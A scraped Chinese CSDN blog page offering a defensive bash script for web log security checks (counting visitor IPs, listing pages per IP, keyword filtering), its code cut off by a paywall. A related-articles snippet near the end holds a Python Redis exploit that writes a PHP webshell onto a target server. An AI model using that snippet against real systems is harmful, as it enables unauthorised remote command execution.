web中间件日志分析脚本1.0(shell脚本)

活着Viva

已于 2022-07-14 10:12:11 修改

阅读量1.2k

点赞数

分类专栏：杂项自己写脚本文章标签： linux bash 运维护网 web安全

于 2022-07-11 16:14:26 首次发布

本文链接：https://blog.csdn.net/weixin_43623271/article/details/125723171

版权

本文介绍了一个用于web日志安全检查的bash脚本，功能包括：列出不同IP的访问次数，查看特定IP的访问页面，统计访问IP数量，以及根据关键词筛选日志。提供了多种运行脚本的方法。

摘要由CSDN通过智能技术生成

一、功能
二、效果图
三、代码
四、运行脚本

主要用于平时web日志的安全检查，护网还是直接看设备比较好

一、功能

列出当天不同IP的访问次数
查看某一个IP访问了哪些页面
查看当天有多少个IP访问
根据关键词筛选日志内容

二、效果图

0.刚运行脚本需要输入日志文件名或绝对路径

在这里插入图片描述
输入错误需要重新输入

1.可查看不同IP的访问次数

在这里插入图片描述

2.查看某一IP访问了哪些页面，下面还可以将该日志保存到文件中，按y保存，IP一定要写选项1里面有的IP

在这里插入图片描述

3.查看当天共有多少个IP访问

在这里插入图片描述

4.筛选出具有关键词的日志

在这里插入图片描述

三、代码

#!/bin/bash

# 字体颜色
Green_font_prefix="\033[32m"
Red_font_prefix="\033[31m"
Font_color_suffix="\033[0m"

# 分割线
line(){
   
for i in {
   1..100};do
  if [ $i -ne 100 ];then
    echo -ne "-"

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

活着Viva

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
web中间件日志分析脚本1.0(shell脚本)

web中间件日志安全分析脚本，目的减轻逐行输入代码的工作量。
复制链接

扫一扫

专栏目录

使用shell脚本取出服务器图片的方法

09-15

Shell脚本是Linux系统中的一种强大工具，它允许用户通过编写文本文件来自动化一系列命令，实现批处理操作。在IT运维工作中，特别是在服务器管理和数据处理上，Shell脚本发挥着至关重要的作用。本文将详细讲解如何...

应急响应——Web日志分析

negnegil的博客

09-17

3939

Web日志 Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析，不仅可以帮助我们定位攻击者，还可以帮助我们还原攻击路径，找到网站存在的安全漏洞并进行修复。 Web日志格式 218.19.140.242 - - [10/Dec/2010:09:31:17 +0800] “GET /query/trendxml/district/todayreturn/month/2009-12-14/2010-12-09/haizhu_tianhe.xml HTTP/1.1

参与评论您还未登录，请先登录后发表或查看评论

shell工作常用脚本，nginx过滤日志相关-nginx日志输出配置json格式

jialiu111111的博客

06-21

1080

1.nginx查日志脚本首先查看日志每个值对应的意思，根据这个去查请求的ip地址。

Web服务器免费开源日志分析工具和行为分析工具

那些年....的专栏

11-18

2926

1、AWStats 提到开源分析工具，我们不得不首先介绍AWStats。这个软件不但在国际上流行，就是在国内也被广泛采用。究其原因主要是这个软件的图形界面优秀，并且以很好的形式展示信息。随便浏览一下，用户就能够看到所有可以提供的报告。AWStats可以很好地支持中文。 AWStats主要优点：使用跨平台的Perl CGI语言，可以很好地在Windows、Unix、Linux等操作系

高效工作之-----如何看中间件日志

weixin_40669549的博客

02-28

3282

虽然日益流行的的docker让中间件的安装部署使用零成本，还是整理一下老码农在日常工作中对于中间间的经验，纯从部署角度因为参与了很多部署支撑相关的工作，以及整理发布包可能知识有些落伍，分享的有些晚但也算记录一下老年码农的艰辛历史。毕竟docker也是会出现一些意向不到的问题。场景一：服务器centos7.2 ， docker1.12 的独立node服务启动。 ...

9款日志采集和管理工具对比，选型必备！

weixin_44421461的博客

04-17

868

点击上方“Java基基”，选择“设为星标”做积极的人，而不是积极废人！每天14:00更新文章，每天掉亿点点头发...源码精品专栏原创 | Java 2021超神之路，很肝~中文详细注释的开源项目RPC 框架 Dubbo 源码解析网络应用框架 Netty 源码解析消息中间件 RocketMQ 源码解析数据库中间件 Sharding-JDBC 和 MyCAT 源码解析作业调度中间件 Elast...

网络安全应急响应-日志分析技术

Bnessy

03-24

6131

Web日志分析 一、HTTP基础 1. HTTP报文格式解析 HTTP请求报文 HTTP请求包括3部分，分别是请求行、请求头和请求正文。 Windows NT 10.0表示操作系统内核版本号，Windows XP内核号是NT 5.1或NT 5.2（64位操作系统)，Windows Vista的内核版本号是NT 6.0，Windows 7的内核版本号是NT 6.1，Windows 8的内核版本号是NT 6.2，Windows 10的内核版本号是NT 10.0。 rv:98.0是Firefox浏览器的软件

UOS/统信批量维护、更新脚本

04-26

8. **日志记录**：在整个过程中记录详细的日志，以便于后期分析和故障排除。在压缩包的文件列表中提到的"批量维护"可能包含了上述步骤的脚本文件，用户需要根据自己的UOS环境进行适当修改和定制。为了确保脚本的...

自动化部署Redis Shell脚本

01-04

总的来说，通过编写Shell脚本自动化部署Redis，不仅可以提高部署效率，还能确保每次部署的一致性，减少人为错误。结合其他如Docker、Kubernetes等容器化技术，你可以构建更强大的自动化部署体系，适应不断变化的业务...

中间件巡检信息采集脚本

01-17

SHELL脚本，适用于AIX平台下CICS、MQ、WAS的中间件巡检信息采集，包括环境配置获取、日志采集、自动上传等。

安服-中间件&数据库日志分析

xhscxj的博客

11-21

445

分析中间件日志的原因 1.中间件日志记录了Web服务器接收处理请求及运行时错误等各种原始信息 2．通过对日志进行统计、分析和综合，就能有效地掌握服务器的运行状况、发现和排除错误原因、了解客户访问分布等，更好地加强系统的维护和管理

Web日志分析

最新发布

一去二三里...的博客

03-25

1328

Windows日志记录着Windows系统中硬件、软件和系统问题的信息。Windows日志文件本质上是数据库，其中包括有关系统、安全、应用程序的记录。记录的事件包含9个元素：日期/时间、事件级别、用户、计算机、事件ID、来源、任务类别、描述和数据信息。所有事件只能拥有其中的一个事件级别，具体如下。信息事件：指应用程序、驱动程序或服务的成功操作事件。警告事件：指不是直接的、主要的，但会导致将来问题发生的事件。如当磁盘空间不足或未找到打印机时，都会记录一个“警告”事件。

Linux下Jetty中间件日志审计

qq_60778231的博客

11-05

1126

Linux下的Jetty中间件日志审计

Linux之日志检查工具logcheck

月生的静心苑

09-22

2884

Logcheck用来分析庞大的日志文件，过滤出有潜在安全风险或其他不正常情况的日志项目，然后以电子邮件的形式通知指定的用户。Logcheck是一个软件包，用于自动运行和检查系统日志文件，查看是否存在安全违规和异常活动。Logcheck使用一个名为logtail的程序，该程序会记住它在日志文件中读取的最后一个位置，并在后续运行中使用该位置来处理新信息。这个软件包有一些功能，但可能更容易使用，因为它不需要一个持续运行的程序，并且可以将许多系统的所有结果发送回单个位置。此外，它还报告您以前可能没有见过的任何异常系

网站服务常用中间件-日志文件存放目录&IIS&Apache&Tomcat&Nginx&Weblogic&Jboss

m0_65842464的博客

01-21

2207

用户每打开一次网页，服务中间件日志都会记录用户IP、访问的网页地址、访问时间、访问状态等信息，这些信息保存在服务中间件日志文件里，方便网站管理员掌握网页被访问情况和服务器运行情况

呼叫中心中间件如何通过日志去发现问题

H4_9Y的博客

10-06

173

日志（log）是一种记录事件、活动或情况的文件或纪录。在计算机领域中，日志通常是一种记录系统运行过程中发生的事件和错误的文件。日志可以包含时间戳、事件描述、错误代码等信息，帮助开发人员和系统管理员跟踪和分析系统的运行情况，以便诊断问题、调优和改进系统。日志可以用于故障排除、安全审计、性能优化和系统运维等方面。

web中间件日志分析脚本3.0(shell脚本)

Bu2n的博客

07-19

615

3.0版本加了ssrf、目录遍历文件包含检测，优化自动创建目录功能。一般使用1、6、7即可。

护网日志分析基础

m0_59302403的博客

07-10

1826

简要介绍日志分析，给出日志分析的步骤和思路。要求根据日志中的字符串特征，识别攻击者的攻击工具；根据日志中的行为特征，确定攻击者可能的攻击手段等。总结归纳护网中常见的中间件Tomcat、Apache、Weblogic、Nginx、Apache、IIS、MySQL、SQL Server、Oracle的日志路径和日志配置文件路径等。

进击消息中间件系列（十五）：Kafka 日志存储与清除策略

民工哥的博客

08-09

415

点击下方名片，设为星标！回复“1024”获取2TB学习资源！前面介绍了 Kafka副本（Replication）机制、存储机制、事务机制、高可用与生产消费、流式 SQL 引擎 KSQL相关的知识点，今天我将详细的为大家介绍 Kafka 日志存储与清除策略相关知识，希望大家能够从中收获多多！如有帮助，请点在看、转发支持一波！！！日志存储结构存储结构图kafka 中消息是以主题 topic 为基本...

POC脚本实现对一些中间件的漏洞扫描

05-11

首先，需要明确一下需要扫描的中间件和漏洞。假设我们要扫描的是 Redis 中的 RCE 漏洞，可以使用以下 POC 脚本进行扫描： ``` import argparse import telnetlib def check_redis_rce(host, port): try: tn = telnetlib.Telnet(host, port, timeout=5) tn.write(b"config set dir /tmp\n") tn.write(b"config set dbfilename redis_shell.php\n") tn.write(b"set test \"<?php system($_GET['cmd']); ?>\"\n") tn.write(b"save\n") tn.write(b"exit\n") res = tn.read_all().decode("utf-8") if "OK" in res: print("[+] Redis RCE vulnerability exists!") print("[+] Webshell: http://{0}:{1}/redis_shell.php?cmd=".format(host, port)) else: print("[-] Redis RCE vulnerability does not exist.") except Exception as e: print("[-] Error: ", e) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Redis RCE Vulnerability Scanner') parser.add_argument('host', help='Target host') parser.add_argument('port', type=int, help='Target port') args = parser.parse_args() check_redis_rce(args.host, args.port) ``` 该脚本使用 `telnetlib` 库连接 Redis 服务，并执行一系列命令，利用 Redis 的 RCE 漏洞在目标主机上生成一个 Webshell。使用方法： ``` python poc.py 127.0.0.1 6379 ``` 其中，`127.0.0.1` 为目标主机 IP，`6379` 为 Redis 服务端口号。需要注意的是，该脚本只能检测 Redis 中的 RCE 漏洞，如果需要扫描其他中间件和漏洞，需要编写相应的 POC 脚本。同时，使用该脚本进行漏洞扫描需要先获得授权，确保不会对目标系统造成损失。